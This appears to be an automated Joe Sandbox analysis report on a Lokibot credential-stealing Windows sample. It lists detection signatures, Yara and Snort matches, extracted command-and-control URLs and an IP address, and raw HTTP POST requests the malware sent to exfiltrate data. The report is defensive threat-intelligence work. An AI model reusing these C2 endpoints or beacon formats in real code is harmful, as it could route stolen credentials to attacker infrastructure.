Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PI#53034601506400.exe

Overview

General Information

Sample Name:PI#53034601506400.exe
Analysis ID:708241
MD5:05d1649e1b980b3d59b189a2fe07fc3c
SHA1:9227eb122ce621fa3f7375c4a0ac4becd45b82c0
SHA256:66f1a748e30aaa66b2053848270d68f5dc3ec9ccd4b9a5dbaa6a6dfd3139490c
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Lokibot
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • PI#53034601506400.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\PI#53034601506400.exe" MD5: 05D1649E1B980B3D59B189A2FE07FC3C)
    • PI#53034601506400.exe (PID: 2312 cmdline: C:\Users\user\Desktop\PI#53034601506400.exe MD5: 05D1649E1B980B3D59B189A2FE07FC3C)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://162.0.223.13/?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x7f8d4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 26 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PI#53034601506400.exe.2575394.3.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x2d563:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            0.2.PI#53034601506400.exe.38976c0.9.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
            • 0x13278:$s1: http://
            • 0x16233:$s1: http://
            • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
            • 0x13280:$s2: https://
            • 0x13278:$f1: http://
            • 0x16233:$f1: http://
            • 0x13280:$f2: https://
            0.2.PI#53034601506400.exe.38976c0.9.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.PI#53034601506400.exe.38976c0.9.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              0.2.PI#53034601506400.exe.38976c0.9.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
              • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
              Click to see the 73 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.2.5162.0.223.1349699802024317 09/23/22-07:58:29.454711
              SID:2024317
              Source Port:49699
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5162.0.223.1349701802024313 09/23/22-07:58:37.371596
              SID:2024313
              Source Port:49701
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5162.0.223.1349701802021641 09/23/22-07:58:37.371596
              SID:2021641
              Source Port:49701
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5162.0.223.1349699802021641 09/23/22-07:58:29.454711
              SID:2021641
              Source Port:49699
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5162.0.223.1349699802024312 09/23/22-07:58:29.454711
              SID:2024312
              Source Port:49699
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5162.0.223.1349701802024318 09/23/22-07:58:37.371596
              SID:2024318
              Source Port:49701
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5162.0.223.1349700802024312 09/23/22-07:58:35.112918
              SID:2024312
              Source Port:49700
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5162.0.223.1349700802021641 09/23/22-07:58:35.112918
              SID:2021641
              Source Port:49700
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.5162.0.223.1349700802024317 09/23/22-07:58:35.112918
              SID:2024317
              Source Port:49700
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results
              Source: 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://162.0.223.13/?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i"]}
              Source: PI#53034601506400.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: PI#53034601506400.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49699 -> 162.0.223.13:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49699 -> 162.0.223.13:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49699 -> 162.0.223.13:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49700 -> 162.0.223.13:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49700 -> 162.0.223.13:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49700 -> 162.0.223.13:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49701 -> 162.0.223.13:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49701 -> 162.0.223.13:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49701 -> 162.0.223.13:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
              Source: Malware configuration extractorURLs: http://162.0.223.13/?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i
              Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
              Source: Joe Sandbox ViewIP Address: 162.0.223.13 162.0.223.13
              Source: global trafficHTTP traffic detected: POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 162.0.223.13Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9AC780C0Content-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 162.0.223.13Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9AC780C0Content-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 162.0.223.13Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9AC780C0Content-Length: 165Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: unknownTCP traffic detected without corresponding DNS query: 162.0.223.13
              Source: PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org
              Source: PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://centos.org
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
              Source: PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://httpd.apache.org/
              Source: PI#53034601506400.exe, 00000000.00000002.328171471.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: PI#53034601506400.exe, 00000001.00000002.352185413.0000000002F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.centos.org/
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: PI#53034601506400.exe, 00000000.00000003.312172741.0000000005A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/pe.
              Source: PI#53034601506400.exe, 00000000.00000003.312213384.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.312084396.0000000005A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/pe.M
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: PI#53034601506400.exe, 00000000.00000003.325770393.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita5
              Source: PI#53034601506400.exe, 00000000.00000003.325770393.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308277205.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308234434.0000000005A6E000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnGg
              Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnQ
              Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnU
              Source: PI#53034601506400.exe, 00000000.00000003.308277205.0000000005A6F000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308234434.0000000005A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnion
              Source: PI#53034601506400.exe, 00000000.00000003.308708832.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308753663.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.308640910.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cno_
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.340586638.0000000003525000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.343096170.0000000003897000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000001.00000000.323196487.0000000000415000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//
              Source: PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/5
              Source: PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/I
              Source: PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0m
              Source: PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/d
              Source: PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
              Source: PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/:
              Source: PI#53034601506400.exe, 00000000.00000003.310562802.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310333869.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.310914397.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r
              Source: PI#53034601506400.exe, 00000000.00000003.306344407.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.306358549.0000000005A4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: PI#53034601506400.exe, 00000000.00000003.306344407.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, PI#53034601506400.exe, 00000000.00000003.306358549.0000000005A4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com7
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: PI#53034601506400.exe, 00000000.00000003.311913695.0000000005A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: PI#53034601506400.exe, 00000000.00000003.311913695.0000000005A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deu4
              Source: PI#53034601506400.exe, 00000000.00000002.344357322.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: unknownHTTP traffic detected: POST /?0ZbRoqHjbXfrX54fnD4rBmzDYlyFq8Yr7ajvA0OLY4dV9iaxVfYwByaATIgkQeLXp4tZ5i HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 162.0.223.13Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9AC780C0Content-Length: 192Connection: close
              Source: PI#53034601506400.exe, 00000000.00000002.326448349.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.PI#53034601506400.exe.2575394.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.PI#53034601506400.exe.38976c0.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.PI#53034601506400.exe.36e9f68.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.PI#53034601506400.exe.38976c0.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.0.PI#53034601506400.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.PI#53034601506400.exe.2575394.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.PI#53034601506400.exe.2569148.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.PI#53034601506400.exe.3633990.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.PI#53034601506400.exe.2561efc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
